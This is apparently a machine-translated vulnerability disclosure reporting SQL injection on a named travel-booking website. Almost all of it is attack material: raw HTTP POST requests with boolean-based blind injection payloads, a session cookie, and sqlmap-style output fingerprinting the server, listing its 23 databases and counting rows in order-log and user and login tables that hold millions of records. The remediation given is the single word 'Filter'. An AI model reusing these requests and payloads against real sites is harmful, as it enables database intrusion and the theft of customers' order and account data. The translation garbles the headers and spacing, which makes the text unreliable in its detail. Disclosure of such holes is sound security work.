Multiple SQL Injection millions of orders leaked at the main site of AVIC Tesco
POST/NewEdition/ServeWall/PlateServeWallNew. aspx? 0.7027233010157943 & platformname = e HTTP/1.1Content-Length: 13Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.rtpnr.comCookie : ASP. NET_SessionId = 1vofiirwz12vru45ppck0kbx; CheckCode = 7036 Host: www. rtpnr. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) chrome/28.0.1500.63 Safari/537.36 Accept: */* Type = LoadData test payload: e % 'AND 3*2 = 5 AND '000nktz '! = '000nktz % e % 'AND 3*2 = 6 AND '000nktz '! = '000nktz % 2. POST/NewEdition/ServeWall/PlateServeWallNew. aspx? 0.987686010543257 HTTP/1.1Content-Length: 85Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.rtpnr.comCookie : ASP. NET_SessionId = 1vofiirwz12vru45ppck0kbx; CheckCode = 7036 Host: www. rtpnr. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) chrome/28.0.1500.63 Safari/537.36 Accept: */* PlatformCode = HB '% 20AND % 203*2*1% 3d6% 20AND % 20' 000Jc9s '% 3d' 000Jc9s & Type = LoadPlatformStar
---Parameter: platformname (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: 0.7027233010157943&platformname=e%' AND 1645=1645 AND '%'='---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [23]:[*] AutoTicket[*] BACKUP[*] distribution[*] master[*] model[*] MonitorBlocking[*] msdb[*] Temp2015[*] tempdb[*] tslwp[*] YeeGo_BackUp[*] YeeGo_History[*] YeeGo_Order[*] YeeGoCopy[*] YeeGoLog[*] YeeGoTemp[*] YeeGoUser[*] YeeSkyBillings[*] YeeSkyGo_TEST[*] YeeSkyGoLog_History[*] Yeesoho_test[*] YSK_SAAS_History[*] YSK_SAAS_TESTDatabase: AutoTicket+-----------------------------------+---------+| Table | Entries |+-----------------------------------+---------+| dbo.T_ReceivingOrder_Log_20150509 | 4828407 || dbo.T_ReceivingOrder_Log_20150505 | 4761384 || dbo.T_ReceivingOrder_Log_20150506 | 4725686 || dbo.T_ReceivingOrder_Log_20150427 | 4679033 || dbo.T_ReceivingOrder_Log_20150503 | 4663783 || dbo.T_ReceivingOrder_Log_20150501 | 4661247 || dbo.T_ReceivingOrder_Log_20150417 | 4615511 || dbo.T_ReceivingOrder_Log_20150416 | 4578616 || dbo.T_ReceivingOrder_Log_20150423 | 4555551 || dbo.T_ReceivingOrder_Log_20150508 | 4537936 || dbo.T_ReceivingOrder_Log_20150504 | 4529144 || dbo.T_ReceivingOrder_Log_20150502 | 4513908 || dbo.T_ReceivingOrder_Log_20150428 | 4458769 || dbo.T_ReceivingOrder_Log_20150424 | 4426906 || dbo.T_ReceivingOrder_Log_20150430 | 4404906 || dbo.T_ReceivingOrder_Log_20150325 | 4386799 || dbo.T_ReceivingOrder_Log_20150429 | 4357274 || dbo.T_ReceivingOrder_Log_20150421 | 4356534 || dbo.T_ReceivingOrder_Log_20150418 | 4344581 || dbo.T_ReceivingOrder_Log_20150425 | 4338758 || dbo.T_ReceivingOrder_Log_20150419 | 4330283 || dbo.T_ReceivingOrder_Log_20150420 | 4322006 || dbo.T_ReceivingOrder_Log_20150320 | 4313560 || dbo.T_ReceivingOrder_Log_20150319 | 4276456 || dbo.T_ReceivingOrder_Log_20150311 | 4275833 || dbo.T_ReceivingOrder_Log_20150422 | 4270772 || dbo.T_ReceivingOrder_Log_20150426 | 4245304 || dbo.T_ReceivingOrder_Log_20141230 | 4209479 || dbo.T_ReceivingOrder_Log_20150321 | 4192467 || dbo.T_ReceivingOrder_Log_20150415 | 4150012 || dbo.T_ReceivingOrder_Log_20150507 | 4137469 || dbo.T_ReceivingOrder_Log_20150326 | 4117875 || dbo.T_ReceivingOrder_Log_20150324 | 4104741 || dbo.T_ReceivingOrder_Log_20150403 | 4084876 || dbo.T_ReceivingOrder_Log_20150318 | 4070910 || dbo.T_ReceivingOrder_Log_20150414 | 4046374 || dbo.T_ReceivingOrder_Log_20141231 | 4036910 || dbo.T_ReceivingOrder_Log_20150312 | 4000171 || dbo.T_ReceivingOrder_Log_20150402 | 3998813 || dbo.T_ReceivingOrder_Log_20150322 | 3946956 || dbo.T_ReceivingOrder_Log_20150323 | 3929905 || dbo.T_ReceivingOrder_Log_20150327 | 3913425 || dbo.T_ReceivingOrder_Log_20150331 | 3906339 || dbo.T_ReceivingOrder_Log_20150317 | 3898811 || dbo.T_ReceivingOrder_Log_20150409 | 3897456 || dbo.T_ReceivingOrder_Log_20150413 | 3888902 || dbo.T_ReceivingOrder_Log_20150328 | 3885350 || dbo.T_ReceivingOrder_Log_20150408 | 3877437 || dbo.T_ReceivingOrder_Log_20150411 | 3821738 || dbo.T_ReceivingOrder_Log_20150330 | 3817518 || dbo.T_ReceivingOrder_Log_20150313 | 3813373 || dbo.T_ReceivingOrder_Log_20150407 | 3801984 || dbo.T_ReceivingOrder_Log_20150412 | 3798156 || dbo.T_ReceivingOrder_Log_20150401 | 3784647 || dbo.T_ReceivingOrder_Log_20141229 | 3770215 || dbo.T_ReceivingOrder_Log_20150329 | 3758350 || dbo.T_ReceivingOrder_Log_20150314 | 3715299 || dbo.T_ReceivingOrder_Log_20150316 | 3709434 || dbo.T_ReceivingOrder_Log_20150406 | 3699308 || dbo.T_ReceivingOrder_Log_20150404 | 3670486 || dbo.T_ReceivingOrder_Log_20150315 | 3621205 || dbo.T_ReceivingOrder_Log_20150405 | 3573067 || dbo.T_ReceivingOrder_Log_20150410 | 3545505 || dbo.T_ReceivingOrder_Log_20150510 | 3265968 |+-----------------------------------+---------+Database: YeeGoUser+-------------------------------------+---------+| Table | Entries |+-------------------------------------+---------+| dbo.V_Customer_PlatformInfo | 89126 || dbo.T_Application_Platform | 20165 || dbo.T_WorkOrder_PlatformApplication | 13600 || dbo.VW_CW_CusWorkOrder_YeeGo | 11295 || dbo.V_CustomerUserInfo | 8399 || dbo.S_CusInfo_SalesManager | 7011 || dbo.V_User_Permission | 5584 || dbo.VW_YeeGo_UserLogin | 5361 || dbo.T_Customer_Application_Account | 4364 || dbo.T_Customer_Application_Account | 4364 || dbo.V_CusApplyInfo | 4345 || dbo.S_CusInfo_ContactPerson | 4292 || dbo.S_CusInfo_ContactPerson | 4292 || dbo.V_CustomerInfo_ExportUser | 3959 || dbo.SC_UserLogin | 3883 || dbo.SC_UserBasicData | 3729 || dbo.SC_UserBasicData | 3729 || dbo.VW_PDAction | 3641 || dbo.VW_SC_UserLogin_YeeGo | 3641 || dbo.T_CustomerID | 2503 || dbo.SC_UserPermission | 2312 || dbo.T_PDActiveBak | 1990 || dbo.T_PDActiveBak | 1990 || dbo.V_CustomerAccount | 1897 || dbo.T_WorkOrderRemark | 1573 || dbo.T_CustomerFlag_logs | 836 || dbo.SC_Role_Permission | 794 || dbo.SC_Role_Permission | 794 || dbo.SC_Permission | 160 || dbo.T_WorkOrder_QuestionType | 12 || dbo.T_WorkOrder_ContactType | 10 || dbo.V_WorkOrder_ContactType | 10 || dbo.V_WorkOrder_ContactType | 10 || dbo.T_WorkOrder_ContactPurpose | 9 || dbo.T_WorkOrder_ContactPurpose | 9 |+-------------------------------------+---------+
Solution:
Filter